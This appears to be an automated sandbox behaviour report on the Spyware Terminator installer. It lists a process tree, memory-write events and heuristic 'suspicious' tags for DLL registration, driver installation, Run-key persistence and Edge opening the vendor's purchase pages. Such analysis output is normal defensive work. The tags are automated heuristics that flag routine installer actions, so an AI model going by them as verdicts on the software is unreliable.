description pid Process procid_target PID 4204 wrote to memory of 2340 4204 SpywareTerminatorSetup.exe 84 PID 4204 wrote to memory of 2340 4204 SpywareTerminatorSetup.exe 84 PID 4204 wrote to memory of 2340 4204 SpywareTerminatorSetup.exe 84 PID 2340 wrote to memory of 2620 2340 SpywareTerminatorSetup.tmp 102 PID 2340 wrote to memory of 2620 2340 SpywareTerminatorSetup.tmp 102 PID 2340 wrote to memory of 2620 2340 SpywareTerminatorSetup.tmp 102 PID 2340 wrote to memory of 4112 2340 SpywareTerminatorSetup.tmp 103 PID 2340 wrote to memory of 4112 2340 SpywareTerminatorSetup.tmp 103 PID 2340 wrote to memory of 3768 2340 SpywareTerminatorSetup.tmp 104 PID 2340 wrote to memory of 3768 2340 SpywareTerminatorSetup.tmp 104 PID 2340 wrote to memory of 3768 2340 SpywareTerminatorSetup.tmp 104 PID 812 wrote to memory of 3088 812 st_rsser64.exe 107 PID 812 wrote to memory of 3088 812 st_rsser64.exe 107 PID 3768 wrote to memory of 4404 3768 SpywareTerminator.exe 109 PID 3768 wrote to memory of 4404 3768 SpywareTerminator.exe 109 PID 3768 wrote to memory of 4404 3768 SpywareTerminator.exe 109 PID 3768 wrote to memory of 1952 3768 SpywareTerminator.exe 110 PID 3768 wrote to memory of 1952 3768 SpywareTerminator.exe 110 PID 3768 wrote to memory of 1952 3768 SpywareTerminator.exe 110 PID 1952 wrote to memory of 3648 1952 regsvr32.exe 111 PID 1952 wrote to memory of 3648 1952 regsvr32.exe 111 PID 3768 wrote to memory of 760 3768 SpywareTerminator.exe 112 PID 3768 wrote to memory of 760 3768 SpywareTerminator.exe 112 PID 3768 wrote to memory of 760 3768 SpywareTerminator.exe 112 PID 3768 wrote to memory of 3288 3768 SpywareTerminator.exe 113 PID 3768 wrote to memory of 3288 3768 SpywareTerminator.exe 113 PID 3768 wrote to memory of 3288 3768 SpywareTerminator.exe 113 PID 3288 wrote to memory of 2344 3288 regsvr32.exe 114 PID 3288 wrote to memory of 2344 3288 regsvr32.exe 114 PID 3768 wrote to memory of 4884 3768 SpywareTerminator.exe 115 PID 3768 wrote to memory of 4884 3768 SpywareTerminator.exe 115 PID 3768 wrote to memory of 4884 3768 SpywareTerminator.exe 115 PID 2340 wrote to memory of 4676 2340 SpywareTerminatorSetup.tmp 122 PID 2340 wrote to memory of 4676 2340 SpywareTerminatorSetup.tmp 122 PID 2340 wrote to memory of 4676 2340 SpywareTerminatorSetup.tmp 122 PID 4676 wrote to memory of 5052 4676 SpywareTerminator.exe 123 PID 4676 wrote to memory of 5052 4676 SpywareTerminator.exe 123 PID 4676 wrote to memory of 5052 4676 SpywareTerminator.exe 123 PID 4676 wrote to memory of 692 4676 SpywareTerminator.exe 125 PID 4676 wrote to memory of 692 4676 SpywareTerminator.exe 125 PID 4676 wrote to memory of 692 4676 SpywareTerminator.exe 125 PID 692 wrote to memory of 1736 692 SpywareTerminatorShield.exe 126 PID 692 wrote to memory of 1736 692 SpywareTerminatorShield.exe 126 PID 692 wrote to memory of 1736 692 SpywareTerminatorShield.exe 126 PID 2340 wrote to memory of 5040 2340 SpywareTerminatorSetup.tmp 127 PID 2340 wrote to memory of 5040 2340 SpywareTerminatorSetup.tmp 127 PID 2340 wrote to memory of 5040 2340 SpywareTerminatorSetup.tmp 127 PID 5040 wrote to memory of 4884 5040 SpywareTerminator.exe 129 PID 5040 wrote to memory of 4884 5040 SpywareTerminator.exe 129 PID 4884 wrote to memory of 4516 4884 msedge.exe 130 PID 4884 wrote to memory of 4516 4884 msedge.exe 130 PID 4884 wrote to memory of 5068 4884 msedge.exe 131 PID 4884 wrote to memory of 5068 4884 msedge.exe 131 PID 4884 wrote to memory of 5068 4884 msedge.exe 131 PID 4884 wrote to memory of 5068 4884 msedge.exe 131 PID 4884 wrote to memory of 5068 4884 msedge.exe 131 PID 4884 wrote to memory of 5068 4884 msedge.exe 131 PID 4884 wrote to memory of 5068 4884 msedge.exe 131 PID 4884 wrote to memory of 5068 4884 msedge.exe 131 PID 4884 wrote to memory of 5068 4884 msedge.exe 131 PID 4884 wrote to memory of 5068 4884 msedge.exe 131 PID 4884 wrote to memory of 5068 4884 msedge.exe 131 PID 4884 wrote to memory of 5068 4884 msedge.exe 131 PID 4884 wrote to memory of 5068 4884 msedge.exe 131 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\SpywareTerminatorSetup.exe"C:\Users\Admin\AppData\Local\Temp\SpywareTerminatorSetup.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4204 -
C:\Users\Admin\AppData\Local\Temp\is-69TN6.tmp\SpywareTerminatorSetup.tmp"C:\Users\Admin\AppData\Local\Temp\is-69TN6.tmp\SpywareTerminatorSetup.tmp" /SL5="$60180,8420808,160256,C:\Users\Admin\AppData\Local\Temp\SpywareTerminatorSetup.exe"2⤵
- Checks computer location settings
- Drops file in Program Files directory
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2340 -
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\system32\regsvr32.exe" /s "C:\Program Files (x86)\Spyware Terminator\STShell.dll"3⤵
- Loads dropped DLL
- Modifies system executable filetype association
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:2620
-
-
C:\Windows\system32\regsvr32.exe"C:\Windows\system32\regsvr32.exe" /s "C:\Program Files (x86)\Spyware Terminator\STShell64.dll"3⤵
- Loads dropped DLL
- Modifies system executable filetype association
- Modifies registry class
PID:4112
-
-
C:\Program Files (x86)\Spyware Terminator\SpywareTerminator.exe"C:\Program Files (x86)\Spyware Terminator\SpywareTerminator.exe" /INSTALL3⤵
- Adds Run key to start application
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3768 -
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\SysWOW64\regsvr32.exe" /s "C:\Program Files (x86)\Spyware Terminator\STShell.dll"4⤵
- Loads dropped DLL
- Modifies system executable filetype association
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:4404
-
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Spyware Terminator\STShell64.dll"4⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1952 -
C:\Windows\system32\regsvr32.exe/s "C:\Program Files (x86)\Spyware Terminator\STShell64.dll"5⤵
- Loads dropped DLL
- Modifies system executable filetype association
- Modifies registry class
PID:3648
-
-
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\SysWOW64\regsvr32.exe" /s "C:\Program Files (x86)\Spyware Terminator\STInternetGuard.dll"4⤵
- Installs/modifies Browser Helper Object
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Modifies registry class
PID:760
-
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Spyware Terminator\STInternetGuard64.dll"4⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3288 -
C:\Windows\system32\regsvr32.exe/s "C:\Program Files (x86)\Spyware Terminator\STInternetGuard64.dll"5⤵
- Installs/modifies Browser Helper Object
- Loads dropped DLL
- Modifies Internet Explorer settings
- Modifies registry class
PID:2344
-
-
-
C:\Program Files (x86)\Spyware Terminator\STInternetGuard.exe"C:\Program Files (x86)\Spyware Terminator\STInternetGuard.exe" /install4⤵
- Drops file in Program Files directory
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4884
-
-
-
C:\Program Files (x86)\Spyware Terminator\SpywareTerminator.exe"C:\Program Files (x86)\Spyware Terminator\SpywareTerminator.exe" /postinstall3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4676 -
C:\Program Files (x86)\Spyware Terminator\SpywareTerminatorUpdate.exe"C:\Program Files (x86)\Spyware Terminator\SpywareTerminatorUpdate.exe" /INSTALL4⤵
- Drops file in Program Files directory
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5052
-
-
C:\Program Files (x86)\Spyware Terminator\SpywareTerminatorShield.exe"C:\Program Files (x86)\Spyware Terminator\SpywareTerminatorShield.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:692 -
C:\Program Files (x86)\Spyware Terminator\SpywareTerminatorUpdate.exe"C:\Program Files (x86)\Spyware Terminator\SpywareTerminatorUpdate.exe" /CHECKNOW5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1736
-
-
C:\Program Files (x86)\Spyware Terminator\SpywareTerminatorUpdate.exe"C:\Program Files (x86)\Spyware Terminator\SpywareTerminatorUpdate.exe" /CHECKNOW5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5100
-
-
C:\Program Files (x86)\Spyware Terminator\SpywareTerminatorUpdate.exe"C:\Program Files (x86)\Spyware Terminator\SpywareTerminatorUpdate.exe" /CHECKNOW5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4484
-
-
C:\Program Files (x86)\Spyware Terminator\SpywareTerminatorUpdate.exe"C:\Program Files (x86)\Spyware Terminator\SpywareTerminatorUpdate.exe" /CHECKNOW5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4184
-
-
-
-
C:\Program Files (x86)\Spyware Terminator\SpywareTerminator.exe"C:\Program Files (x86)\Spyware Terminator\SpywareTerminator.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5040 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.spywareterminator.com/purchase.aspx?cfg=8&lng=en&subid=W10&dinst=0&b=ST_APP_Motivation4⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4884 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffab0c646f8,0x7ffab0c64708,0x7ffab0c647185⤵PID:4516
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:25⤵PID:5068
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:35⤵
- Suspicious behavior: EnumeratesProcesses
PID:3376
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2820 /prefetch:85⤵PID:4420
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:15⤵PID:4300
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:15⤵PID:4840
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5364 /prefetch:85⤵PID:4848
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5364 /prefetch:85⤵
- Suspicious behavior: EnumeratesProcesses
PID:4512
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5280 /prefetch:15⤵PID:2244
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5300 /prefetch:15⤵PID:1776
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:15⤵PID:1492
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5508 /prefetch:15⤵PID:1400
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:15⤵PID:3556
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3652 /prefetch:15⤵PID:2484
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5496 /prefetch:15⤵PID:3512
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2952 /prefetch:15⤵PID:4744
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2692 /prefetch:15⤵PID:1576
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:15⤵PID:2408
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4880 /prefetch:25⤵
- Suspicious behavior: EnumeratesProcesses
PID:344
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5248 /prefetch:15⤵PID:4620
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3404 /prefetch:85⤵PID:1184
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5704 /prefetch:85⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4172
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2268 /prefetch:15⤵PID:2752
-
-
-
-
-
C:\Program Files (x86)\Spyware Terminator\st_rsser64.exe"C:\Program Files (x86)\Spyware Terminator\st_rsser64.exe"1⤵
- Drops file in Program Files directory
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:812 -
C:\Windows\system32\RUNDLL32.EXE"C:\Windows\system32\RUNDLL32.EXE" SETUPAPI.DLL,InstallHinfSection DefaultInstall 128 C:\PROGRA~2\SPYWAR~1\Driver\stflt.inf2⤵
- Drops file in Drivers directory
PID:3088
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3188
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4580
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1612
-
C:\Windows\SysWOW64\werfault.exewerfault.exe /h /shared Global\e519f5d68c924471852628982de743f6 /t 3192 /p 50401⤵PID:3780
-
C:\Program Files (x86)\Spyware Terminator\SpywareTerminator.exe"C:\Program Files (x86)\Spyware Terminator\SpywareTerminator.exe"1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:5056
-
C:\Windows\SysWOW64\werfault.exewerfault.exe /h /shared Global\d5a742c81d284feda097b04498e76c9d /t 1636 /p 50561⤵PID:1740
-
C:\Program Files (x86)\Spyware Terminator\SpywareTerminator.exe"C:\Program Files (x86)\Spyware Terminator\SpywareTerminator.exe"1⤵
- Adds Run key to start application
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:760 -
C:\Program Files (x86)\Spyware Terminator\SpywareTerminatorUpdate.exe"C:\Program Files (x86)\Spyware Terminator\SpywareTerminatorUpdate.exe" /CHECKBYUSER2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4880
-
-
C:\Program Files (x86)\Spyware Terminator\SpywareTerminator.exe"C:\Program Files (x86)\Spyware Terminator\SpywareTerminator.exe" /FULLSCAN2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4116
-
-
C:\Windows\SysWOW64\werfault.exewerfault.exe /h /shared Global\87132cf9c735419d8a9ff5f92d38b777 /t 4616 /p 7601⤵PID:4604
-
C:\Program Files (x86)\Spyware Terminator\SpywareTerminator.exe"C:\Program Files (x86)\Spyware Terminator\SpywareTerminator.exe"1⤵
- Adds Run key to start application
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3636 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pcrx.com/purchase.aspx?st=8&lng=en2⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of SendNotifyMessage
PID:5084 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffab0c646f8,0x7ffab0c64708,0x7ffab0c647183⤵PID:2524
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2264,10469530977205901978,1400793979011051205,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2276 /prefetch:23⤵PID:4988
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2264,10469530977205901978,1400793979011051205,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2460 /prefetch:33⤵PID:4804
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2264,10469530977205901978,1400793979011051205,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2940 /prefetch:83⤵PID:60
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,10469530977205901978,1400793979011051205,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3688 /prefetch:13⤵PID:3020
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,10469530977205901978,1400793979011051205,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3708 /prefetch:13⤵PID:2868
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.safetyoptimizer.com/lp/lp1.aspx?cfg=62⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:1468 -
